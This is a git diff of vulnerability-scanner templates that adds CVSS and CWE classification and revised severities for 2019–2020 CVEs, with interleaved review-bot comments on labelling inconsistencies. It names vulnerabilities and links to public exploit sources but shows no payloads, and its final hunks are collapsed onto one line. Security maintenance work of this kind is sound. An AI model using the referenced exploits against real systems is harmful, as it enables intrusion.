+    - https://vinhjaxt.github.io/2019/03/cve-2019-6715
+    - http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-7219.yaml b/cves/2019/CVE-2019-7219.yaml
index f97c0dc144..076926d4d7 100644
--- a/cves/2019/CVE-2019-7219.yaml
+++ b/cves/2019/CVE-2019-7219.yaml
@@ -3,13 +3,18 @@ id: CVE-2019-7219
 info:
   name: Zarafa WebApp Reflected XSS
   author: pdteam
-  severity: low
+  severity: medium
   description: |
     Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead.
   reference:
     - https://github.com/verifysecurity/CVE-2019-7219
     - https://stash.kopano.io/repos?visibility=public
   tags: cve,cve2019,zarafa,xss
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2019-7219
+    cwe-id: CWE-79
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-7238.yaml b/cves/2019/CVE-2019-7238.yaml
index b989d29259..e6d8c9427e 100644
--- a/cves/2019/CVE-2019-7238.yaml
+++ b/cves/2019/CVE-2019-7238.yaml
@@ -8,6 +8,11 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2019-7238
     - https://github.com/jas502n/CVE-2019-7238
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2019-7238
+  description: "Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control."
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-7254.yaml b/cves/2019/CVE-2019-7254.yaml
index 1cf467a83d..8e6ffca73b 100644
--- a/cves/2019/CVE-2019-7254.yaml
+++ b/cves/2019/CVE-2019-7254.yaml
@@ -6,6 +6,12 @@ info:
   severity: high
   reference: https://www.exploit-db.com/exploits/47616
   tags: emerge,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.80
+    cve-id: CVE-2019-7254
+    cwe-id: CWE-22
+  description: "Linear eMerge E3-Series devices allow File Inclusion."
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-7256.yaml b/cves/2019/CVE-2019-7256.yaml
index a236e9b923..225bf2bb83 100644
--- a/cves/2019/CVE-2019-7256.yaml
+++ b/cves/2019/CVE-2019-7256.yaml
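Review bot: The new `description` line for CVE-2019-7238 is placed after the `classification` block, whereas every other template in this commit keeps `description` among the top-level `info` fields next to `name`/`severity`, before `reference` and `tags`; the same placement is used in the CVE-2019-7254 hunk on this line, and in CVE-2019-7275 and CVE-2019-8937 below. Moving the line up so the block reads `author`, `severity`, `description`, `reference`, `tags`, `classification` keeps the info block diffable against its siblings. The double quotes are not needed (no escapes, no YAML-special leading character), though they are harmless. The `requests` section is outside the hunk.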
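Review bot: While the CVE-2019-7254 info block is being touched, its `tags: emerge,lfi` context line is the only one in this commit without the `cve,cve2019` tags that the sibling templates carry (compare CVE-2019-7256 on the next line), so `-tags cve2019` runs will skip this template. Suggested line: `tags: cve,cve2019,emerge,lfi`. The tags line itself is not part of the change, so this is a follow-up rather than a defect in the added lines.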
@@ -9,6 +9,11 @@ info:
     - https://www.exploit-db.com/exploits/47619
     - http://linear-solutions.com/nsc_family/e3-series/ # vendor homepage
   tags: cve,cve2019,emerge,rce
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.00
+    cve-id: CVE-2019-7256
+    cwe-id: CWE-78
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-7275.yaml b/cves/2019/CVE-2019-7275.yaml
index 1945fe217d..c50714bebc 100644
--- a/cves/2019/CVE-2019-7275.yaml
+++ b/cves/2019/CVE-2019-7275.yaml
@@ -3,12 +3,18 @@ id: CVE-2019-7275
 info:
   name: Open Redirect in Optergy Proton/Enterprise BMS
   author: 0x_Akoko
-  severity: low
+  severity: medium
   reference:
     - https://packetstormsecurity.com/files/155268/Optergy-Proton-Enterprise-BMS-2.3.0a-Open-Redirect.html
     - https://applied-risk.com/resources/ar-2019-008
     - https://cxsecurity.com/issue/WLB-2019110074
   tags: cve,cve2019,redirect
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2019-7275
+    cwe-id: CWE-601
+  description: "Optergy Proton/Enterprise devices allow Open Redirect."
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-7481.yaml b/cves/2019/CVE-2019-7481.yaml
index 3f22173a79..7d6021e2bb 100644
--- a/cves/2019/CVE-2019-7481.yaml
+++ b/cves/2019/CVE-2019-7481.yaml
@@ -9,6 +9,11 @@ info:
   reference:
     - https://www.crowdstrike.com/blog/how-ecrime-groups-leverage-sonicwall-vulnerability-cve-2019-7481/
   tags: cve,cve2019,sonicwall,sqli
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.50
+    cve-id: CVE-2019-7481
+    cwe-id: CWE-200
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-7609.yaml b/cves/2019/CVE-2019-7609.yaml
index 97c3a627c3..8621f4e5a1 100644
--- a/cves/2019/CVE-2019-7609.yaml
+++ b/cves/2019/CVE-2019-7609.yaml
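Review bot: In the CVE-2019-7481 hunk the added `cwe-id: CWE-200` sits next to a `tags` line that classifies the template as `sqli`, so the two machine-readable labels on this template disagree about the weakness class. If the CWE was copied from the upstream record it is defensible as-is, but anyone selecting templates by CWE will not find this one under injection while the tag says it is one; either add the injection CWE alongside, `cwe-id: CWE-89,CWE-200` (the comma form this commit already uses for CVE-2020-10546), or note in a comment why the record's CWE is kept. The request itself is outside the hunk, so I cannot tell which behaviour the template actually confirms.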
@@ -9,6 +9,11 @@ info:
     - https://github.com/mpgn/CVE-2019-7609
     - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077
   tags: cve,cve2019,kibana,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.00
+    cve-id: CVE-2019-7609
+    cwe-id: CWE-94
 
 requests:
   - method: POST
diff --git a/cves/2019/CVE-2019-8442.yaml b/cves/2019/CVE-2019-8442.yaml
index 74622a2fa8..6effba17ec 100644
--- a/cves/2019/CVE-2019-8442.yaml
+++ b/cves/2019/CVE-2019-8442.yaml
@@ -2,10 +2,14 @@ id: CVE-2019-8442
 info:
   name: JIRA Directory Traversal
   author: Kishore Krishna (siLLyDaddy)
-  severity: medium
+  severity: high
   description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check.
   reference: https://jira.atlassian.com/browse/JRASERVER-69241
   tags: cve,cve2019,atlassian,jira,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.50
+    cve-id: CVE-2019-8442
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-8446.yaml b/cves/2019/CVE-2019-8446.yaml
index 1dd04da7ee..99959daaf4 100644
--- a/cves/2019/CVE-2019-8446.yaml
+++ b/cves/2019/CVE-2019-8446.yaml
@@ -6,6 +6,14 @@ info:
   author: dhiyaneshDk
   severity: medium
   tags: cve,cve2019,jira
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.30
+    cve-id: CVE-2019-8446
+    cwe-id: CWE-863
+  reference:
+    - https://jira.atlassian.com/browse/JRASERVER-69777
+    - https://www.talosintelligence.com/vulnerability_reports/TALOS-2019-0839
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-8449.yaml b/cves/2019/CVE-2019-8449.yaml
index 9552542758..8467b0fa56 100644
--- a/cves/2019/CVE-2019-8449.yaml
+++ b/cves/2019/CVE-2019-8449.yaml
@@ -9,6 +9,11 @@ info:
     - https://www.doyler.net/security-not-included/more-jira-enumeration
     - https://jira.atlassian.com/browse/JRASERVER-69796
   tags: cve,cve2019,atlassian,jira
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.30
+    cve-id: CVE-2019-8449
+    cwe-id: CWE-306
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-8451.yaml b/cves/2019/CVE-2019-8451.yaml
index c13e0e6df5..7fe324b099 100644
--- a/cves/2019/CVE-2019-8451.yaml
+++ b/cves/2019/CVE-2019-8451.yaml
@@ -10,6 +10,11 @@ info:
     - https://jira.atlassian.com/browse/JRASERVER-69793
     - https://hackerone.com/reports/713900
   tags: cve,cve2019,atlassian,jira,ssrf,oob
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
+    cvss-score: 6.50
+    cve-id: CVE-2019-8451
+    cwe-id: CWE-918
 
 requests:
   - method: POST
diff --git a/cves/2019/CVE-2019-8903.yaml b/cves/2019/CVE-2019-8903.yaml
index 38120db1ea..c8648e91fe 100644
--- a/cves/2019/CVE-2019-8903.yaml
+++ b/cves/2019/CVE-2019-8903.yaml
@@ -10,6 +10,11 @@ info:
     - https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7
     - https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b
   tags: cve,cve2019,totaljs,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.50
+    cve-id: CVE-2019-8903
+    cwe-id: CWE-22
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-8937.yaml b/cves/2019/CVE-2019-8937.yaml
index 778a2e1312..3a09c5cd0b 100644
--- a/cves/2019/CVE-2019-8937.yaml
+++ b/cves/2019/CVE-2019-8937.yaml
@@ -6,6 +6,12 @@ info:
   severity: medium
   reference: https://www.exploit-db.com/exploits/46429
   tags: cve,cve2019,xss,hoteldruid
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2019-8937
+    cwe-id: CWE-79
+  description: "HotelDruid 2.3.0 has XSS affecting the nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php."
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-8982.yaml b/cves/2019/CVE-2019-8982.yaml
index 8af7a5e681..63269422cc 100644
--- a/cves/2019/CVE-2019-8982.yaml
+++ b/cves/2019/CVE-2019-8982.yaml
@@ -2,10 +2,15 @@ id: CVE-2019-8982
 info:
   name: Wavemaker Studio 6.6 LFI/SSRF
   author: madrobot
-  severity: high
+  severity: critical
   description: com/wavemaker/studio/StudioService.java in WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value, leading to disclosure of local files and SSRF.
   reference: https://www.exploit-db.com/exploits/45158
   tags: cve,cve2019,wavemaker,lfi,ssrf
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
+    cvss-score: 9.60
+    cve-id: CVE-2019-8982
+    cwe-id: CWE-918
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-9041.yaml b/cves/2019/CVE-2019-9041.yaml
index 77491477a4..05c0ba21cc 100644
--- a/cves/2019/CVE-2019-9041.yaml
+++ b/cves/2019/CVE-2019-9041.yaml
@@ -9,6 +9,11 @@ info:
     - http://www.iwantacve.cn/index.php/archives/118/
     - https://www.exploit-db.com/exploits/46454/
   tags: cve,cve2019,zzzcms,rce
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.20
+    cve-id: CVE-2019-9041
+    cwe-id: CWE-917
 
 requests:
   - method: POST
diff --git a/cves/2019/CVE-2019-9618.yaml b/cves/2019/CVE-2019-9618.yaml
index 3c31a10ae9..58167af430 100644
--- a/cves/2019/CVE-2019-9618.yaml
+++ b/cves/2019/CVE-2019-9618.yaml
@@ -3,7 +3,7 @@ id: CVE-2019-9618
 info:
   name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
   author: daffainfo
-  severity: high
+  severity: critical
   description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
@@ -11,6 +11,11 @@ info:
     - https://www.exploit-db.com/exploits/46537
     - https://nvd.nist.gov/vuln/detail/CVE-2019-9618
   tags: cve,cve2019,wordpress,wp-plugin,lfi
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2019-9618
+    cwe-id: CWE-22
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-9670.yaml b/cves/2019/CVE-2019-9670.yaml
index 059f75bb43..baeb281791 100644
--- a/cves/2019/CVE-2019-9670.yaml
+++ b/cves/2019/CVE-2019-9670.yaml
@@ -6,6 +6,18 @@ info:
   author: ree4pwn
   severity: critical
   tags: cve,cve2019,zimbra,xxe
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2019-9670
+    cwe-id: CWE-611
+  reference:
+    - https://www.exploit-db.com/exploits/46693/
+    - https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
+    - https://bugzilla.zimbra.com/show_bug.cgi?id=109129
+    - http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce
+    - http://packetstormsecurity.com/files/152487/Zimbra-Collaboration-Autodiscover-Servlet-XXE-ProxyServlet-SSRF.html
+    - https://isc.sans.edu/forums/diary/CVE20199670+Zimbra+Collaboration+Suite+XXE+vulnerability/27570/
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-9733.yaml b/cves/2019/CVE-2019-9733.yaml
index 7a4bf4d89d..91b8589da2 100644
--- a/cves/2019/CVE-2019-9733.yaml
+++ b/cves/2019/CVE-2019-9733.yaml
@@ -10,6 +10,10 @@ info:
     - https://www.ciphertechs.com/jfrog-artifactory-advisory/
     - https://www.jfrog.com/confluence/display/RTF/Release+Notes#ReleaseNotes-Artifactory6.8.6
   tags: cve,cve2019,artifactory
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2019-9733
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-9955.yaml b/cves/2019/CVE-2019-9955.yaml
index 5c6356d56d..ed6ed3a6cf 100644
--- a/cves/2019/CVE-2019-9955.yaml
+++ b/cves/2019/CVE-2019-9955.yaml
@@ -3,7 +3,7 @@ id: CVE-2019-9955
 info:
   name: CVE-2019-9955 Zyxel XSS
   author: pdteam
-  severity: low
+  severity: medium
   tags: cve,cve2019,xss
   description: On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security firewall login page is vulnerable to Reflected XSS via the unsanitized 'mp_idx' parameter.
   reference:
@@ -12,6 +12,11 @@ info:
     https://www.exploit-db.com/exploits/46706/
     https://www.securitymetrics.com/blog/Zyxel-Devices-Vulnerable-Cross-Site-Scripting-Login-page
     https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2019-9955
+    cwe-id: CWE-79
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-9978.yaml b/cves/2019/CVE-2019-9978.yaml
index 871ea7acfb..4b3b772039 100644
--- a/cves/2019/CVE-2019-9978.yaml
+++ b/cves/2019/CVE-2019-9978.yaml
@@ -3,10 +3,15 @@ id: CVE-2019-9978
 info:
   name: WordPress social-warfare RFI
   author: madrobot,dwisiswant0
-  severity: critical
+  severity: medium
   description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
   reference: https://github.com/mpgn/CVE-2019-9978
   tags: cve,cve2019,wordpress,wp-plugin,ssrf
+  classification:
+    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2019-9978
+    cwe-id: CWE-79
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-0618.yaml b/cves/2020/CVE-2020-0618.yaml
index b593db8f88..acbb89de1a 100644
--- a/cves/2020/CVE-2020-0618.yaml
+++ b/cves/2020/CVE-2020-0618.yaml
@@ -12,6 +12,11 @@ info:
     - https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
     - https://github.com/euphrat1ca/CVE-2020-0618
   tags: cve,cve2020,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.80
+    cve-id: CVE-2020-0618
+    cwe-id: CWE-502
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-10148.yaml b/cves/2020/CVE-2020-10148.yaml
index f7958eb7cb..2aa69a564f 100644
--- a/cves/2020/CVE-2020-10148.yaml
+++ b/cves/2020/CVE-2020-10148.yaml
@@ -3,7 +3,7 @@ id: CVE-2020-10148
 info:
   name: SolarWinds Orion API Auth Bypass Leads to RCE (SUPERNOVA)
   author: dwisiswant0
-  severity: high
+  severity: critical
   description: |
     This template could allow to bypass authentication and execute API commands which may result in a compromise of the SolarWinds instance.
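Review bot: The CVE-2019-9978 hunk lowers `severity` from critical to medium and adds `cwe-id: CWE-79`, but the surrounding `name` still says "RFI" and `tags` still says `ssrf`, so after this change the template's labels describe three different weakness classes. The new severity and CWE follow the XSS wording of the `description`; if the request below actually fetches a remote file through the `swp_url` parameter (its body is outside the hunk, so I cannot confirm), the XSS-based 6.1 understates what the template demonstrates and the old severity was the safer one. Either way the labels should agree: if the template is kept as an XSS check, `tags: cve,cve2019,wordpress,wp-plugin,xss` and a matching `name`; if it is an inclusion check, the CWE and severity should reflect that rather than the vulnerability database's XSS entry.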
@@ -13,6 +13,11 @@ info:
     - https://gist.github.com/0xsha/75616ef6f24067c4fb5b320c5dfa4965
     - https://twitter.com/0xsha/status/1343800953946787847
   tags: cve,cve2020,solarwinds,rce
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-10148
+    cwe-id: CWE-287
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-10546.yaml b/cves/2020/CVE-2020-10546.yaml
index 658064e6d2..a7e3cdd179 100644
--- a/cves/2020/CVE-2020-10546.yaml
+++ b/cves/2020/CVE-2020-10546.yaml
@@ -2,12 +2,17 @@ id: CVE-2020-10546
 info:
   name: rConfig 3.9.4 SQLi
   author: madrobot
-  severity: high
+  severity: critical
   description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicies.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
   reference:
     - https://github.com/theguly/exploits/blob/master/CVE-2020-10546.py
     - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
   tags: cve,cve2020,rconfig,sqli
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-10546
+    cwe-id: CWE-89,CWE-522
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-10547.yaml b/cves/2020/CVE-2020-10547.yaml
index 4213adc816..445f4d31d4 100644
--- a/cves/2020/CVE-2020-10547.yaml
+++ b/cves/2020/CVE-2020-10547.yaml
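Review bot: The CVE-2020-10546 hunk writes two identifiers into one scalar, `cwe-id: CWE-89,CWE-522`, while every other hunk in this commit gives `cwe-id` a single value; the same form is used for CVE-2020-10547, CVE-2020-10548 and CVE-2020-10549 on the next lines. If the template loader splits this field on commas the value is fine, but a consumer that treats it as one string will match neither `CWE-89` nor `CWE-522`; I cannot confirm the loader's behaviour from this diff. If a list is intended, a YAML sequence is unambiguous: `cwe-id:` followed by `  - CWE-89` and `  - CWE-522`, provided the schema accepts that shape; otherwise a short comment on the line stating that the comma form is the supported one would stop future edits from "fixing" it.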
@@ -2,12 +2,17 @@ id: CVE-2020-10547
 info:
   name: rConfig 3.9.4 SQLi
   author: madrobot
-  severity: high
+  severity: critical
   description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
   reference:
     https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py
     https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
   tags: cve,cve2020,rconfig,sqli
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-10547
+    cwe-id: CWE-89,CWE-522
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-10548.yaml b/cves/2020/CVE-2020-10548.yaml
index d5d9e17baf..fb420c8e1b 100644
--- a/cves/2020/CVE-2020-10548.yaml
+++ b/cves/2020/CVE-2020-10548.yaml
@@ -2,12 +2,17 @@ id: CVE-2020-10548
 info:
   name: rConfig 3.9.4 SQLi
   author: madrobot
-  severity: high
+  severity: critical
   description: rConfig 3.9.4 and previous versions has unauthenticated devices.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
   reference:
     - https://github.com/theguly/exploits/blob/master/CVE-2020-10548.py
     - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
   tags: cve,cve2020,rconfig,sqli
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-10548
+    cwe-id: CWE-89,CWE-522
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-10549.yaml b/cves/2020/CVE-2020-10549.yaml
index 7447d9e4c9..9a05c1f547 100644
--- a/cves/2020/CVE-2020-10549.yaml
+++ b/cves/2020/CVE-2020-10549.yaml
@@ -2,12 +2,17 @@ id: CVE-2020-10549
 info:
   name: rConfig 3.9.4 SQLi
   author: madrobot
-  severity: high
+  severity: critical
   description: rConfig 3.9.4 and previous versions has unauthenticated snippets.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
   reference:
     - https://github.com/theguly/exploits/blob/master/CVE-2020-10549.py
     - https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
   tags: cve,cve2020,rconfig,sqli
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.80
+    cve-id: CVE-2020-10549
+    cwe-id: CWE-89,CWE-522
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml
index c43c5b0539..46bc230027 100644
--- a/cves/2020/CVE-2020-11034.yaml
+++ b/cves/2020/CVE-2020-11034.yaml
@@ -3,13 +3,18 @@ id: CVE-2020-11034
 info:
   name: GLPI v.9.4.6 - Open redirect
   author: pikpikcu
-  severity: low
+  severity: medium
   description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection, which is based on a regexp. This is fixed in version 9.4.6.
   reference:
     - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
     - https://github.com/glpi-project/glpi/archive/9.4.6.zip
     - https://nvd.nist.gov/vuln/detail/CVE-2020-11034
   tags: cve,cve2020,redirect
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2020-11034
+    cwe-id: CWE-601
 
 requests:
diff --git a/cves/2020/CVE-2020-11110.yaml b/cves/2020/CVE-2020-11110.yaml
index 09b3133b28..da0bf70b6c 100644
--- a/cves/2020/CVE-2020-11110.yaml
+++ b/cves/2020/CVE-2020-11110.yaml
@@ -9,6 +9,11 @@ info:
   reference:
     - https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
     - https://nvd.nist.gov/vuln/detail/CVE-2020-11110
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.10
+    cve-id: CVE-2020-11110
+    cwe-id: CWE-79
 requests:
   - raw:
       - |
diff --git a/cves/2020/CVE-2020-11455.yaml b/cves/2020/CVE-2020-11455.yaml
index 88231d2864..99abf2cac1 100644
--- a/cves/2020/CVE-2020-11455.yaml
+++ b/cves/2020/CVE-2020-11455.yaml
@@ -3,12 +3,17 @@ id: CVE-2020-11455
 info:
   name: LimeSurvey 4.1.11 - Path Traversal
   author: daffainfo
-  severity: high
+  severity: medium
   description: LimeSurvey before 4.1.12+200324 contains a path traversal vulnerability in application/controllers/admin/LimeSurveyFileManager.php.
   reference:
     - https://www.exploit-db.com/exploits/48297
     - https://www.cvedetails.com/cve/CVE-2020-11455
   tags: cve,cve2020,lfi
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.30
+    cve-id: CVE-2020-11455
+    cwe-id: CWE-22
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-11547.yaml b/cves/2020/CVE-2020-11547.yaml
index 80fa059eb9..c9b6f8c040 100644
--- a/cves/2020/CVE-2020-11547.yaml
+++ b/cves/2020/CVE-2020-11547.yaml
@@ -9,6 +9,11 @@ info:
     - https://github.com/ch-rigu/CVE-2020-11547--PRTG-Network-Monitor-Information-Disclosure
     - https://nvd.nist.gov/vuln/detail/CVE-2020-11547
   tags: cve,cve2020,prtg,disclosure
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.30
+    cve-id: CVE-2020-11547
+    cwe-id: CWE-200
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-11710.yaml b/cves/2020/CVE-2020-11710.yaml
index f5550ad166..038ff53d98 100644
--- a/cves/2020/CVE-2020-11710.yaml
+++ b/cves/2020/CVE-2020-11710.yaml
@@ -3,10 +3,14 @@ id: CVE-2020-11710 info: name: Kong Admin Rest API Unauth author: pikpikcu - severity: info + severity: critical description: An issue was discovered in docker-kong (for Kong) through 2.0.3. The admin API port may be accessible on interfaces other than 127.0.0.1. reference: https://nvd.nist.gov/vuln/detail/CVE-2020-11710 tags: cve,cve2020,kong + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-11710 requests: - method: GET diff --git a/cves/2020/CVE-2020-11738.yaml b/cves/2020/CVE-2020-11738.yaml index cfbb12b802..adec053def 100644 --- a/cves/2020/CVE-2020-11738.yaml +++ b/cves/2020/CVE-2020-11738.yaml @@ -13,6 +13,11 @@ info: reference: https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild tags: cve,cve2020,wordpress,wp-plugin,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-11738 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2020/CVE-2020-11853.yaml b/cves/2020/CVE-2020-11853.yaml index 8e2f1ce615..4d9ba909d4 100644 --- a/cves/2020/CVE-2020-11853.yaml +++ b/cves/2020/CVE-2020-11853.yaml @@ -14,6 +14,10 @@ info: Originated from Metasploit module (#14654). tags: cve,cve2020,opm,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-11853 requests: - method: GET diff --git a/cves/2020/CVE-2020-11854.yaml b/cves/2020/CVE-2020-11854.yaml index 0f5f1bf477..710aa30a11 100644 --- a/cves/2020/CVE-2020-11854.yaml +++ 